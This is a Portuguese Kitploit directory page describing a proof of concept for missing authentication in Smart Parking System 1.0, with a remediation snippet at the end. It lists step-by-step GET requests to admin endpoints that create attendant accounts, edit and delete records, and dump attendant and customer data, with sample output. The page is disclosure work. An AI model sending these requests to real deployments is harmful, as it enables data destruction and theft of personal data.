Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-10243-AUTH — Prova de conceito demonstrando acesso não autenticado a funções administrativas críticas no Smart Parking System 1.0, permitindo criação de contas, manipulação de dados e exposição de PII. | Kitploit
Ferramentas/GitHubGitHub/xmyronn/cve-2026-10243-auth
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticação
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

Prova de conceito demonstrando acesso não autenticado a funções administrativas críticas no Smart Parking System 1.0, permitindo criação de contas, manipulação de dados e exposição de PII.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Smart Parking System 1.0 - Acesso Não Autenticado a Funções Administrativas Críticas

Informações da Vulnerabilidade

CampoDetalhes
ProdutoSmart Parking System
Fornecedorcode-projects.org
Versão1.0
Classe de VulnerabilidadeAusência de Autenticação para Função Crítica (CWE-306)
ID CVEPendente
Pontuação CVSS9.8 Crítica (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Autenticação NecessáriaNenhuma
Arquivos Afetadosattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

Descrição

O Smart Parking System 1.0 da code-projects.org não aplica autenticação em vários endpoints exclusivos de administrador. Um atacante remoto não autenticado pode acessar diretamente esses endpoints sem cookie de sessão e realizar operações privilegiadas, incluindo criação de contas de atendente, edição e exclusão de registros de estacionamento e visualização de todos os dados pessoais (PII) de clientes e dados de reservas.

Nenhuma credencial, nenhum token de sessão e nenhuma interação de qualquer usuário legítimo é necessária para explorar esta vulnerabilidade.


Visão Geral da Cadeia de Ataque

root@kitploit:~
Sem credenciais / sem sessão
        ↓
Requisição GET direta aos endpoints de administrador
        ↓
attendant.php     → criar contas de atendente fraudulentas
edit.php          → ler e sobrescrever qualquer registro de estacionamento
basic_table.php   → excluir qualquer registro de estacionamento
basic_table2.php  → despejar todos os dados pessoais (PII) dos atendentes
admin_request.php → despejar todos os e-mails de clientes e dados de reservas
        ↓
Funcionalidade administrativa completa comprometida

Prova de Conceito Passo a Passo

Passo 1 — Confirmar o Estado Não Autenticado

Abra uma nova sessão de navegador sem cookies. Navegue até a raiz da aplicação. A página de login é apresentada, confirmando que não há sessão ativa:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

Passo 2 — Acessar o Painel de Criação de Atendentes (Sem Autenticação)

Navegue diretamente para o endpoint de registro de atendentes:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

Resultado: O formulário completo "Add Parking Attendant Details" é carregado com campos para nome, sobrenome, número de celular, rua, nome de usuário e senha. Um atacante pode registrar uma conta de atendente fraudulenta com acesso ao sistema.


Passo 3 — Ler e Modificar Registros de Estacionamento (Sem Autenticação)

Navegue diretamente para o endpoint de edição de registros de estacionamento:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

Resultado: O formulário "Update Parkings Details" é carregado pré-preenchido com valores reais do banco de dados:

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

Um atacante pode sobrescrever qualquer campo e enviar para persistir as alterações diretamente no banco de dados.


Passo 4 — Excluir Registro de Estacionamento (Sem Autenticação)

Envie uma requisição GET direta para o endpoint de exclusão:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

Resultado: A aplicação responde com:

root@kitploit:~
Parking deleted successfully

O registro é permanentemente destruído no banco de dados. Nenhuma autenticação, nenhum token CSRF e nenhum prompt de confirmação é necessário.


Passo 5 — Despejar Todos os Atendentes de Estacionamento (Sem Autenticação)

Navegue diretamente para o endpoint de listagem de atendentes:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

Resultado: A lista completa de atendentes é retornada, incluindo nomes, números de celular e ruas designadas:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

Passo 6 — Despejar Todos os Dados de Reservas de Clientes (Sem Autenticação)

Navegue diretamente para o endpoint de solicitações de reservas do administrador:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

Resultado: Todos os registros de reservas de clientes são retornados, incluindo e-mails, vagas, horas e custos:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

Impacto

  • Acesso total ao painel administrativo — toda a funcionalidade privilegiada acessível sem nenhuma credencial
  • Destruição de dados — qualquer registro de estacionamento pode ser excluído permanentemente
  • Manipulação de dados — qualquer registro de estacionamento pode ser modificado
  • Escalação de privilégios — contas de atendente fraudulentas podem ser criadas com login no sistema
  • Exposição de dados pessoais (PII) — todos os e-mails de clientes e histórico de reservas são coletados
  • Vazamento de dados de atendentes — lista completa incluindo nomes e números de telefone exposta

Resumo dos Arquivos Afetados

ArquivoVulnerabilidade
attendant.phpCriação de conta de atendente sem autenticação
edit.phpAcesso de leitura/escrita sem autenticação a registros de estacionamento
basic_table.phpExclusão sem autenticação de registros de estacionamento
basic_table2.phpAcesso sem autenticação a todos os dados pessoais (PII) dos atendentes
admin_request.phpAcesso sem autenticação a todos os dados de reservas de clientes

Remediação

Adicione uma verificação de autenticação de sessão no topo de cada arquivo PHP voltado ao administrador:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

Referências

  • Página Inicial do Fornecedor
  • CWE-306: Ausência de Autenticação para Função Crítica
  • OWASP: Controle de Acesso Quebrado

Descobridor

  • Pesquisador: Imad Alvi
Baixar ferramenta